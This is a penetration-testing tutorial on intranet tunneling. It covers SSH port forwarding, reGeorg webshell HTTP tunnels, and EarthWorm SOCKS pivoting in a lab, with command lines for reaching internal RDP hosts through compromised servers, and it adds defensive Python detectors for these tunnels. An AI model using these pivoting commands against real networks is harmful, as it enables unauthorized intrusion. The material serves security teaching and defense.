Intranet penetration test: hidden communication tunnel technology (part 2)


In Intranet penetration test: hidden communication tunnel technology (part 1), we explained network layer tunneling (IPv6 tunnels, ICMP tunnels) and transport layer tunneling (TCP tunnels, UDP tunnels, conventional port forwarding). Today a large share of raw TCP and UDP communication is intercepted by defensive systems, and traditional socket tunnels are on the verge of being phased out. Protocols that are hard to block outright, such as DNS, ICMP and HTTP/HTTPS, have become the main channels attackers use to control a tunnel. In this part we give an experimental walkthrough of application layer tunnels and SOCKS proxy technology. Application layer DNS tunnels will get a dedicated post later.

Application layer tunneling technology
The application layer is the seventh layer of the seven-layer OSI model. It interfaces directly with application programs and provides common network application services. Application layer tunneling mainly uses the ports provided by application software to carry data. Commonly used protocols are SSH, HTTP/HTTPS and DNS. Here we cover SSH and HTTP/HTTPS; DNS tunnels will be covered in a dedicated post later.
SSH protocol

SSH is an application layer security protocol designed to provide security for remote login sessions and other network services. Using SSH effectively prevents information leakage during remote management. SSH started as a program on UNIX systems and quickly spread to other platforms. SSH clients exist for many platforms, and almost all UNIX platforms (HP-UX, Linux, AIX, Solaris, Digital UNIX, Irix and others) can run SSH.
SSH traffic is generally allowed through firewalls and border devices, and the SSH session is encrypted, so it is hard to tell a legitimate SSH session from a tunnel established by an attacker; this is why attackers favour it. Once an attacker has used an SSH tunnel to get past firewall restrictions, they can establish TCP connections that were not possible before.

SSH commands

ssh username@ip -p <port number>

The parameters commonly used when creating an ssh tunnel are:
  • -C: compress the transmission to increase transfer speed
  • -f: run the ssh transfer in the background without occupying the current shell
  • -N: silent connection; no interactive session is opened after connecting
  • -g: allow remote hosts to connect to the locally forwarded port
  • -L: local port forwarding
  • -R: remote port forwarding
  • -D: dynamic forwarding (SOCKS proxy)
  • -p: specify the ssh port
Local forwarding experiment
Test environment:

Attacker vps
  Simulated external network IP: 192.168.1.101
Intranet web server
  Simulated external network IP: 192.168.1.103
  Intranet IP: 192.168.52.128
Intranet victim machine Windows Server 8
  Intranet IP: 192.168.52.138

The attacker vps can reach the intranet web server but not the intranet victim machine Windows Server 8; the web server and Windows Server 8 can reach each other. Our idea is to use the web server as a springboard to reach port 3389 of Windows Server 8. This assumes that the plaintext SSH password for the web server has already been obtained.
Execute on the attacker vps:
ssh -CfNg -L 1153:192.168.52.138:3389 root@192.168.1.103

Here 1153 is the port opened on the vps, 192.168.52.138:3389 is the target machine and target port, and root@192.168.1.103 is the springboard (the web server). The attacker vps initiates the connection to the web server, and -L selects local port forwarding.
Checking the listening ports on the vps confirms that, during local mapping, the local ssh process is listening on port 1153.
The principle is to use the web server 192.168.1.103 as a springboard to map port 3389 of the intranet Windows Server 8 (192.168.52.138) onto port 1153 of the attacker’s vps. Connecting to local port 1153 on the vps therefore reaches port 3389 of the intranet Windows Server 8 (192.168.52.138):
rdesktop 127.0.0.1:1153
As you can see, I successfully connected to the remote desktop of Windows Server 8 in the intranet. This method only needs a single command on the attack host, which is quite convenient.
Remote forwarding experiment
The test environment is similar, but this time the attacker vps has no direct route into the internal network and cannot reach any of its three machines; the internal web server can reach the external vps, while Windows Server 8 and the domain controller cannot reach the external vps at all. Our idea is to reach port 3389 of the internal Windows Server 8 through the external vps.
Execute the following command on the web server (192.168.52.128):
ssh -CfNg -R 3307:192.168.52.138:3389 root@192.168.1.101

Here 3307 is the port opened on the vps, 192.168.52.138:3389 is the target machine and target port, and root@192.168.1.101 is the vps. The victim host initiates the connection to the vps, and -R selects remote port forwarding.
On the vps the new listening port is now visible:
Here the web server acts as a springboard that forwards traffic arriving on port 3307 of the vps to port 3389 of the intranet Windows Server 8 (192.168.52.138). Connecting to port 3307 of the vps therefore reaches the remote desktop on port 3389 of Windows Server 8 in the intranet:
Dynamic forwarding experiment
The port forwarding types introduced above are all called static port forwarding: “static” means the IP address and listening port of the application server are fixed. Now imagine another scenario: configuring the browser to reach websites on a different network through port forwarding. Here the target server’s IP and port are unknown and constantly changing, so they cannot be known when the forward is created; they are only determined when the HTTP request is sent. Static port forwarding is not feasible in this scenario, so a special kind of forwarding, “dynamic port forwarding”, is needed. SSH dynamic port forwarding is implemented with the SOCKS protocol: when dynamic forwarding is created, the SSH server behaves like a SOCKS proxy server, so this method is also called SOCKS forwarding.
The test environment is as follows:
We execute the following command on the vps to establish a dynamic SOCKS proxy channel:
ssh -CfNg -D 7000 root@192.168.1.103
Here 192.168.1.103 is the intranet web server. Unlike before, the command does not specify a target server or port. After it runs, the SSH client (the attacker vps) listens on port 7000 of localhost. In the browser’s network configuration on that machine, set the SOCKS server to 127.0.0.1:7000; browser requests are then forwarded to the SSH server (the intranet web server), which establishes the connection to the target site (the intranet file server).
As you can see, with dynamic mapping the ssh process on the local host listens on port 7000. We open the browser on the attacker vps and configure the proxy network settings:
In this way the intranet file server can be reached through the browser:

The dynamic port forwarding here actually establishes an SSH-encrypted SOCKS proxy channel. A SOCKS proxy simply connects the system on one end to the other end: your network requests are sent through the channel between you and the target, and whatever arrives at one end is forwarded to the other. Any program that supports the SOCKS protocol can use this encrypted channel for proxied access.
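Checking for these listeners from the defender’s side, as an added example that is not part of the original post: the script below parses the output of ss -tlnp (a constructed sample whose ports mirror the 1153, 7000 and 3307 forwards above) and flags sockets that look like SSH forwards, noting which ones are bound to all interfaces.

```python
import re

# Constructed sample of `ss -tlnp` output (not captured from the page's hosts);
# the port numbers mirror the tunnels above: 1153 (-L), 7000 (-D), 3307 (-R).
SAMPLE_SS_OUTPUT = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      128    0.0.0.0:1153        0.0.0.0:*         users:(("ssh",pid=4242,fd=5))
LISTEN 0      128    127.0.0.1:7000      0.0.0.0:*         users:(("ssh",pid=4243,fd=5))
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*         users:(("sshd",pid=911,fd=3))
LISTEN 0      128    [::]:22             [::]:*            users:(("sshd",pid=911,fd=4))
LISTEN 0      128    0.0.0.0:3307        0.0.0.0:*         users:(("sshd",pid=5120,fd=9))
LISTEN 0      511    0.0.0.0:80          0.0.0.0:*         users:(("nginx",pid=700,fd=6))
"""

# One LISTEN row: local address:port plus the first (process, pid) owning the socket.
ROW_RE = re.compile(
    r'^LISTEN\s+\d+\s+\d+\s+(?P<addr>\S+):(?P<port>\d+)\s+\S+\s+'
    r'users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+)'
)

# Binds on these addresses are reachable from other hosts (ssh -g / GatewayPorts).
WILDCARD_ADDRS = {"0.0.0.0", "*", "[::]", "::"}


def find_ssh_forward_listeners(ss_output, sshd_ports=(22,)):
    """Return listening sockets that look like SSH port forwards.

    - An `ssh` client process that listens at all is serving a -L or -D forward
      (the socket alone cannot tell the two apart).
    - An `sshd` process listening on something other than the SSH service port(s)
      is the server side of a -R remote forward.
    - `exposed` is True when the bind address is a wildcard, i.e. the forward is
      reachable from the network rather than from localhost only.
    """
    findings = []
    for line in ss_output.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        proc, port = m.group("proc"), int(m.group("port"))
        if proc == "ssh":
            kind = "local-or-dynamic (-L/-D)"
        elif proc == "sshd" and port not in sshd_ports:
            kind = "remote (-R)"
        else:
            continue
        findings.append({
            "pid": int(m.group("pid")),
            "process": proc,
            "port": port,
            "kind": kind,
            "exposed": m.group("addr") in WILDCARD_ADDRS,
        })
    return findings


if __name__ == "__main__":
    for f in find_ssh_forward_listeners(SAMPLE_SS_OUTPUT):
        scope = "all interfaces" if f["exposed"] else "loopback only"
        print(f"pid {f['pid']} ({f['process']}) port {f['port']}: {f['kind']}, {scope}")
```

On a real host, pipe the live output in (for example ss -tlnp | python3 this_script.py with a small stdin wrapper) and treat any hit as something to explain; on the server side the directives AllowTcpForwarding and GatewayPorts in sshd_config decide whether such forwards are possible at all.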

HTTP(S) protocol

HTTP is the Hypertext Transfer Protocol, a very simple communication protocol and the most widely used one for carrying information on the Internet. Some local area networks restrict protocols so that users can only reach external websites over HTTP; in that case an HTTP service proxy can be used to forward all traffic into the intranet.
reGeorg
Download link: https://github.com/sensepost/reGeorg

First of all, we need to understand the difference between a forward proxy and a reverse proxy:

Forward Proxy

Lhost-->proxy-->Rhost

To access Rhost, Lhost sends a request to the proxy server and names Rhost as the target; the proxy forwards the request to Rhost and returns the content it obtains to Lhost. Simply put, with a forward proxy the proxy visits Rhost on our behalf.

Reverse proxy

Lhost<-->proxy<-->firewall<-->Rhost

In contrast to a forward proxy, Lhost only sends ordinary requests to the proxy; the proxy decides where they go and hands the returned data back. The advantage is that this still works when a firewall only allows the proxy’s traffic in and out, so it can be used to get through.

Simply put, a forward proxy means the attacker actively reaches the target machine through the proxy, and a reverse proxy means the target machine actively connects out through the proxy. reDuh and tunna, which we commonly use, are forward proxies just like reGeorg. In general the user uploads a proxy script to the server, a local program connects to that script, and the script acts as the proxy that forwards ports and traffic.

reGeorg is an upgraded version of reDuh. Its main function is to forward intranet server ports to the local machine through an HTTP(S) tunnel, so that all communication rides on the HTTP protocol.
The test environment is as follows:
There are three hosts on the internal network. The web server (win7) has two network cards, one on the internal and one on the external network. The remaining two internal hosts cannot communicate with the external network but can communicate with the web server; the attacker vps can reach the web server. Our idea is to use the HTTP server as a proxy that forwards all of the attacker’s traffic into the intranet, in order to gain control of the remaining hosts there.
Upload the reGeorg script file tunnel.nosocket.php to the target web server. The attacker then requests tunnel.nosocket.php on the remote server; once the page returns “Georg says, 'All seems fine'”, the attacker runs the reGeorgSocksProxy.py script on Kali to listen on local port 9999 and establish the communication link.

During the operation, upload tunnel.(aspx|ashx|jsp|php) to the target web server, depending on which language the remote server supports. My target is a PHP server, so we upload tunnel.nosocket.php. The PHP version comes in socket and non-socket variants: tunnel.php needs the dl() function to load the socket module, which requires modifying php.ini, so we use tunnel.nosocket.php instead.

Then the attacker executes:
python reGeorgSocksProxy.py -u http://192.168.1.7/tunnel.nosocket.php -p 9999
When the program stops at “Georg says, 'All seems fine'”, it is running normally.
Next, install and configure proxychains-ng:
git clone https://github.com/rofl0r/proxychains-ng.git
cd proxychains-ng
./configure
make && make install
cp ./src/proxychains.conf /etc/proxychains.conf
cd .. && rm -rf proxychains-ng
Edit the proxychains configuration file:
vim /etc/proxychains.conf

Add the following line at the end:

socks5 127.0.0.1 9999

Here 9999 is your own port; it must match the port set in reGeorg (proxychains.conf uses # for comments, so do not put a trailing comment on the proxy line itself).
Now you can use proxychains to make applications on the attacker’s vps reach resources in the target intranet through the proxy. The usage is to prefix the tool name with proxychains4, for example scanning port 3389 of the intranet Windows Server 8 host with nmap through proxychains:
proxychains4 nmap 192.168.52.138 -Pn -sT -p 3389
The -Pn and -sT options are required: proxychains only intercepts TCP connections, so host discovery pings and raw-socket SYN scans would not go through the tunnel.
You can see the data passing through in the shell in which the proxy was set up.
Next, open the remote desktop of the intranet Windows Server 8 host:
proxychains4 rdesktop 192.168.52.138
Success. On Windows, tools such as SocksCap can be used for the proxy instead:
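Seen from the web server, this tunnel is one client driving a stream of small requests to a single uploaded script. As an added example that is not from the original post or the reGeorg project, the script below scans access-log lines (a constructed sample in combined log format) and flags client/script pairs with a burst of requests; the window and threshold values are assumptions to tune per site.

```python
import re
from collections import defaultdict
from datetime import datetime

# Combined-log-format line: client, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def find_http_tunnels(lines, window_s=60, min_requests=20,
                      script_exts=(".php", ".aspx", ".ashx", ".jsp")):
    """Flag (client, script) pairs that receive at least min_requests hits inside
    any window_s-second sliding window. A tunnel client like reGeorgSocksProxy.py
    polls the uploaded script continuously, so it stands out against normal page
    views. window_s and min_requests are assumed values; tune them per site."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m.group("path").split("?", 1)[0]
        if not path.lower().endswith(script_exts):
            continue
        hits[(m.group("ip"), path)].append(datetime.strptime(m.group("ts"), TS_FMT))
    findings = []
    for (client, path), stamps in hits.items():
        stamps.sort()
        start = 0
        for end, t in enumerate(stamps):
            while (t - stamps[start]).total_seconds() > window_s:
                start += 1
            if end - start + 1 >= min_requests:
                findings.append({"client": client, "path": path, "requests": len(stamps),
                                 "first": stamps[0].isoformat(), "last": stamps[-1].isoformat()})
                break
    return findings


def _line(ip, ts, method, path, size, ua):
    return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" 200 {size} "-" "{ua}"'


# Constructed sample log (not from the page's hosts): one client fetches the tunnel
# script once, then drives 40 small POSTs to it within a few seconds.
SAMPLE_LOG_LINES = [
    _line("192.168.1.101", "10/Oct/2020:13:55:36 +0800", "GET", "/index.php", 5120, "Mozilla/5.0"),
    _line("192.168.1.101", "10/Oct/2020:13:55:40 +0800", "GET", "/tunnel.nosocket.php", 22,
          "python-requests/2.22"),
] + [
    _line("192.168.1.101", f"10/Oct/2020:13:55:{41 + i // 5} +0800", "POST",
          "/tunnel.nosocket.php", 0, "python-requests/2.22")
    for i in range(40)
] + [
    _line("192.168.1.50", "10/Oct/2020:13:55:50 +0800", "GET", "/about.php", 3100, "Mozilla/5.0"),
]

if __name__ == "__main__":
    for f in find_http_tunnels(SAMPLE_LOG_LINES):
        print(f"{f['client']} -> {f['path']}: {f['requests']} requests, {f['first']} .. {f['last']}")
```

A hit on a script that was not part of the deployed application, combined with the small response sizes, is the signal to compare the file against the deployment and pull the upload path.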
Another important technology of application layer tunneling is DNS tunneling technology. I will write a special topic to introduce it in the future.
SOCKS proxy technology
A SOCKS proxy is an all-purpose proxy. Like an adapter board with many jumpers, it simply connects the system on one end to the other end, and it supports multiple protocols, including HTTP and FTP requests as well as other request types. It comes in two versions, SOCKS 4 and SOCKS 5: SOCKS 4 only supports TCP, while SOCKS 5 supports TCP and UDP and also supports various authentication mechanisms and other protocols. Its standard port is 1080. The proxy server that speaks the SOCKS protocol is called a SOCKS server, a general-purpose proxy server. Using SOCKS to communicate with computers in the target intranet avoids having to set up port forwarding over and over.
There are three common network scenarios as follows:
In the internal network, the server can access the external network at will.
In the internal network, the server can access the external network, but the server is installed with a firewall to reject connections on sensitive ports.
In the internal network, the server only opens some ports (for example, port 80), and the server cannot access the external network.
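To recognise such a proxy on the wire, whether it is ssh -D, reGeorg or the EarthWorm ssocksd/rssocks service described below, it helps to know what the first bytes of a SOCKS session look like. The parser below is an added example, not code from the post or from any of these tools; the handshakes it decodes are constructed samples whose targets mirror the lab hosts above, and the hostname fileserver.lab.internal is made up.

```python
import ipaddress
import struct
SOCKS5_METHODS = {0x00: "no-auth", 0x01: "gssapi", 0x02: "username/password"}
SOCKS_CMDS = {0x01: "CONNECT", 0x02: "BIND", 0x03: "UDP ASSOCIATE"}

def _cstring(buf, start):
    """Return (text, index just past the NUL) for a NUL-terminated field, or (None, -1)."""
    end = buf.find(b"\x00", start)
    return (None, -1) if end < 0 else (buf[start:end].decode("latin-1"), end + 1)

def parse_socks4_request(data):
    """SOCKS4/4a request: VN=4 | CD | DSTPORT(2) | DSTIP(4) | USERID NUL [ DOMAIN NUL ]."""
    if len(data) < 9 or data[0] != 4 or data[1] not in (1, 2):
        return None
    port, raw_ip = struct.unpack("!H4s", data[2:8])
    userid, pos = _cstring(data, 8)
    if userid is None:
        return None
    # SOCKS4a: a DSTIP of 0.0.0.x (x != 0) means "resolve the domain that follows".
    if raw_ip[:3] == b"\x00\x00\x00" and raw_ip[3] != 0:
        host, _ = _cstring(data, pos)
        if host is None:
            return None
    else:
        host = str(ipaddress.IPv4Address(raw_ip))
    return {"version": 4, "cmd": SOCKS_CMDS[data[1]], "host": host, "port": port, "userid": userid}

def parse_socks5_greeting(data):
    """SOCKS5 client greeting: VER=5 | NMETHODS | METHODS (one byte each)."""
    if len(data) < 3 or data[0] != 5 or len(data) != 2 + data[1]:
        return None
    return {"version": 5, "methods": [SOCKS5_METHODS.get(m, hex(m)) for m in data[2:]]}

def parse_socks5_request(data):
    """SOCKS5 request (after the greeting): VER=5 | CMD | RSV=0 | ATYP | DST.ADDR | DST.PORT(2)."""
    if len(data) < 7 or data[0] != 5 or data[1] not in SOCKS_CMDS or data[2] != 0:
        return None
    atyp = data[3]
    if atyp == 1:                 # IPv4: 4 address bytes
        pos = 8
    elif atyp == 3:               # domain name: 1 length byte + name
        pos = 5 + data[4]
    elif atyp == 4:               # IPv6: 16 address bytes
        pos = 20
    else:
        return None
    if len(data) != pos + 2:      # the address must be followed by exactly the 2-byte port
        return None
    if atyp == 1:
        host = str(ipaddress.IPv4Address(data[4:8]))
    elif atyp == 3:
        host = data[5:pos].decode("latin-1")
    else:
        host = str(ipaddress.IPv6Address(data[4:20]))
    (port,) = struct.unpack("!H", data[pos:])
    return {"version": 5, "cmd": SOCKS_CMDS[data[1]], "host": host, "port": port}

def classify_socks(first_bytes):
    """What a TCP stream opens with: a SOCKS4/4a request, a SOCKS5 greeting, or None."""
    return parse_socks4_request(first_bytes) or parse_socks5_greeting(first_bytes)

# Constructed sample handshakes (not captured traffic); targets mirror the lab hosts above.
SAMPLES = {
    "socks5-greeting": b"\x05\x02\x00\x02",
    "socks5-connect": b"\x05\x01\x00\x01" + bytes([192, 168, 52, 138]) + struct.pack("!H", 3389),
    "socks4-connect": b"\x04\x01" + struct.pack("!H", 3389) + bytes([192, 168, 52, 138]) + b"ew\x00",
    "socks4a-connect": b"\x04\x01" + struct.pack("!H", 80) + b"\x00\x00\x00\x01"
                       + b"\x00fileserver.lab.internal\x00",   # made-up hostname
}
```

Run classify_socks over the first client bytes of each new TCP flow to a non-standard port: a SOCKS greeting or request where no proxy is supposed to exist is a strong sign of a tunnel endpoint like the ones set up on ports 7000, 888 and 1080 in this post.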
EarthWorm
Download link: https://github.com/rootkiter/EarthWorm
https://codeload.github.com/idlefire/ew/zip/master
EW is a portable network penetration tool with two core functions: setting up a SOCKS v5 service and port forwarding, with which it can complete network penetration in complex network environments. EarthWorm can open a tunnel in “forward”, “reverse”, “multi-level cascade” and other modes to reach deep into a network, breaking through network restrictions in its own earthworm-like way and loosening the soil under the firewall. The toolkit contains several executables for different operating systems (Linux, Windows, Mac OS and ARM-Linux are all included).
reGeorg
Download link: https://github.com/sensepost/reGeorg
The main function of reGeorg is to forward ports of the intranet server to the local machine through an HTTP(S) tunnel, forming a loop, so that ports that are only open inside the internal network (or are restricted by port policy) can be reached via the target server. reGeorg uses a webshell to build a SOCKS proxy for intranet penetration; the server must support one of ASPX, PHP or JSP.
SocksCap64
Download link: http://www.sockscap64.com/
SocksCap64 is a very useful proxy tool for Windows that lets Windows applications access the network through a SOCKS proxy server.
Proxifier
Download link: https://www.proxifier.com/
Proxifier is also a very easy-to-use global proxy software, which provides cross-platform port forwarding and proxy functions, and is suitable for Windows, Linux, and Mac OS platforms.
ProxyChains
Download link: https://github.com/rofl0r/proxychains-ng
http://proxychains.sourceforge.net/
ProxyChains is a tool that implements a global proxy under Linux. It is very easy to use: it lets any application reach the Internet through a proxy, allows TCP and DNS traffic to pass through the proxy tunnel, and supports HTTP, SOCKS 4 and SOCKS 5 proxy servers.
Let me talk about the specific usage of these tools.
EarthWorm
EW has six command modes: ssocksd, rcsocks, rssocks, lcx_slave, lcx_listen and lcx_tran. ssocksd is used for forward connections in a normal network environment, rcsocks and rssocks are used for reverse (rebound) connections, and the remaining commands are used for multi-level cascading in complex network environments.
Test environment: on the left is the attacker’s personal computer, located in the attacker’s own intranet, and the attacker also has a vps on the public network; on the right is a victim intranet with three machines. The web server we have taken control of has two network cards and is the key node joining the external and internal networks; the other internal machines cannot be reached directly.
(1) Forward SOCKS 5 server
This applies when the target machine has an external IP address. As shown in the figure above, the simulated external IP of the intranet web server is 192.168.1.7. Upload the matching ew program to the web server and execute:
ew_for_Win.exe -s ssocksd -l 888
This sets up a SOCKS proxy service on port 888 of the intranet web server. Next we configure proxychains or SocksCap64 to use this SOCKS server (192.168.1.7, port 888). Configure proxychains:
Open the remote desktop of the intranet Windows server 8:
proxychains4 rdesktop 192.168.52.138
(2) Rebound SOCKS 5 server
The forward SOCKS 5 server is applicable when the target machine has an external IP address. Assuming that the target machine does not have a public IP address, how do we access internal resources?
In this test environment, it is similar to the previous one, except that the web server does not have a public IP, but can access the Internet; the VPS is a real public network vps.
Upload ew_for_linux64 on the attacker’s public network vps and execute:
./ew_for_linux64 -s rcsocks -l 1080 -e 1234
This command adds a relay on the vps: it listens on port 1234 for the connection from the intranet and relays proxy traffic between that connection and port 1080; port 1234 is used only to carry the tunnel traffic.
Then, upload ew_for_Win.exe to the intranet web server (192.168.52.143) and execute the command:
ew_for_Win.exe -s rssocks -d 39.xxx.xxx.210 -e 1234
This command starts the SOCKS 5 service on the victim’s web server and bounces it back to port 1234 on the public IP 39.xxx.xxx.210. At this point the vps displays “rssocks cmd_socket OK!”, indicating that the connection succeeded:
Now tools such as proxychains or SocksCap64 on the attacker’s computer can be configured to use the SOCKS 5 proxy service running on the intranet web server by connecting to port 1080 of the public vps (39.xxx.xxx.210). For example, open the remote desktop of the intranet file server:
proxychains4 rdesktop 192.168.52.141
(3) Secondary network environment (a)
It is applicable when the target machine has an external IP address.
Host A on the right has two network cards: one is connected to the external network (192.168.1.7), the other can only reach host B in the internal network and cannot reach other internal hosts. Host B can reach the other intranet resources but not the external network. Suppose we have obtained control of both host A and host B.
We first upload ew to host B, and start the forward socks proxy of port 1234 in ssocksd mode:
ew_for_Win.exe -s ssocksd -l 1234
Then, upload ew to host A and execute the command:
ew_for_Win.exe -s lcx_tran -l 1080 -f 192.168.52.138 -g 1234
This command forwards proxy requests received by host A on port 1080 to port 1234 on host B (192.168.52.138).
Now we can use the SOCKS proxy service on host B by connecting to port 1080 of host A’s public IP (192.168.1.7). Configure proxychains:
Use ssh to connect to the intranet server (192.168.52.128); the connection succeeds.
(4) Secondary network environment (b)
The previous case applies when the target machine has an external IP address. What if the target machine has no public IP address?
In the environment shown above, host A has no public IP; it can reach the external network and host B in the internal network, but cannot reach other internal hosts. Host B can reach internal resources but not the external network. Suppose we have obtained control of both host A and host B.
Here we cannot connect to host A to use the SOCKS proxy on host B as in the previous case; instead we reach the SOCKS service on host B by connecting to the vps.
First upload ew to the public vps and add a relay tunnel there that listens on port 1080 and passes the proxy requests received on port 1080 to port 1234:
ew_for_linux64 -s lcx_listen -l 1080 -e 1234
Then upload ew to intranet host B (192.168.52.138) and start a forward SOCKS proxy on port 999 with ssocksd:
ew_for_Win.exe -s ssocksd -l 999
Finally, upload ew to intranet host A (192.168.52.143) and use lcx_slave to join port 1234 of the public vps with port 999 of intranet host B (192.168.52.138):
ew_for_Win.exe -s lcx_slave -d 39.xxx.xxx.210 -e 1234 -f 192.168.52.138 -g 999
Now set up a proxy tool such as proxychains and use the SOCKS proxy service on intranet host B by connecting to port 1080 of the public vps. Configure proxychains as follows:
Access the remote desktop of the intranet machine (192.168.52.141):
The access succeeds. Besides proxychains, proxy tools such as Proxifier and SocksCap64 can also be used. Below, we use SocksCap64 to reach the intranet machines.
Open SocksCap64 and add the application you want to proxy (simply locate the executable and drag it in); here I add the remote desktop program.
Click “Proxy” at the top, add a proxy, and set the IP of the vps or proxy server and the chosen port.
After adding it, click “Save” in the lower right corner. Back on the main screen, click the “lightning” button to test whether the proxy server can be reached.
Once the connection test passes, right-click the remote desktop program and select “Run the selected program in the proxy tunnel” to access the remote machine on the intranet.
In the same way, we can also use a browser to reach intranet resources, for example those on the intranet server 192.168.52.128:
